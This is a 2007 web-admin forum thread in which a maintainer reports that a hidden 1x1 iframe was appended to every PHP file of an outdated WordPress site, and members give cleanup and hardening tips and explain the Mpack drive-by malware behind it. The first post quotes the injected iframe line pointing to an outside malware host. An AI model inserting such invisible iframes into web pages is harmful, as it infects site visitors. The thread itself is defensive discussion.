Site was hacked

Discussion in 'Site & Server Administration' started by rederick, Jun 18, 2007.

  1. #1
    Hi there,

    I've had a site that I help maintain get hacked. It's a strange sort of hack and luckily it doesn't seem to damaging. Might even be some type of virus installed on the server. Anyways seems to be that every single one of the .php files on the site have now the code below placed at the bottom of the file.

    <iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe>
    
    Code (markup):
    The site is running Wordpress Version Version 2.0 and a has alot of custom coding.

    I am moving the site off this server shortly - but just curious if anyone has seen this type of thing before?
     
    rederick, Jun 18, 2007 IP
  2. ndreamer

    ndreamer Guest

    Messages:
    339
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #2
    do you run a virus scanner? those iframe hacks normally point to spyware, viruses or trogens which is very damaging not only to your users but to your site as google will update your sites listing with a nice warning next to it.

    im not familar with wordpress if it has any config files check in those for the iframe if it's there remove it and chmod the file so it's not writable.
     
    ndreamer, Jun 19, 2007 IP
  3. agnivo007

    agnivo007 Peon

    Messages:
    4,290
    Likes Received:
    289
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Make a habit upgrading to latest WP version and not to unnecessarily leave 777 permissions.
     
    agnivo007, Jun 19, 2007 IP
  4. InFloW

    InFloW Peon

    Messages:
    1,488
    Likes Received:
    39
    Best Answers:
    0
    Trophy Points:
    0
    #4
    Always keep your scripts up to date! Even if you have custom coding make sure to patch exploits that are released for your script. When you're running old versions of things like wordpress it's simply a matter of time before you're exploited. People just do searches for powered by wordpress check the exploit and move on. Quite a few exploit attempts are even done with bots so if you're in google you'll eventually be found.
     
    InFloW, Jun 19, 2007 IP
  5. inworx

    inworx Peon

    Messages:
    4,860
    Likes Received:
    201
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Check your server for any shells exploits etc. and CHMOD most of the files to 644 or so
     
    inworx, Jun 19, 2007 IP
  6. rederick

    rederick Peon

    Messages:
    128
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #6
    - yeah the site is on a $9 a month shared host, the wordpress version is out of date, but the guy who owns the site won't pay me - so sad to say that he's on his own.

    Just thought it was interesting to have that type of thing happen to a website as I wasn't exactly sure how the hacker benifited from that.


    Thank you for the feedback.
     
    rederick, Jun 19, 2007 IP
  7. clancey

    clancey Peon

    Messages:
    1,099
    Likes Received:
    63
    Best Answers:
    0
    Trophy Points:
    0
    #7
    Read this article at Pandasoftware

    The problem is likely non-trivial. Mpack apprarantly contains tools which help buyers locate vulnerable web servers. They are then inserting "iframe" code into the webpages, which tries to place malware on the visitor's computer.

    The web server probably has some kind of shell installed. In a shared hosting environment, the hacker may be able to probe around to see what else they might discover about the machine.

    Computers infected via the iframe become part of the botnets used to send out spam, launch DDOS attacks and so on and so on.
     
    clancey, Jun 19, 2007 IP
  8. inworx

    inworx Peon

    Messages:
    4,860
    Likes Received:
    201
    Best Answers:
    0
    Trophy Points:
    0
    #8
    check by validator.w3.org

    You'll see any errors in any page including iframe.
     
    inworx, Jun 20, 2007 IP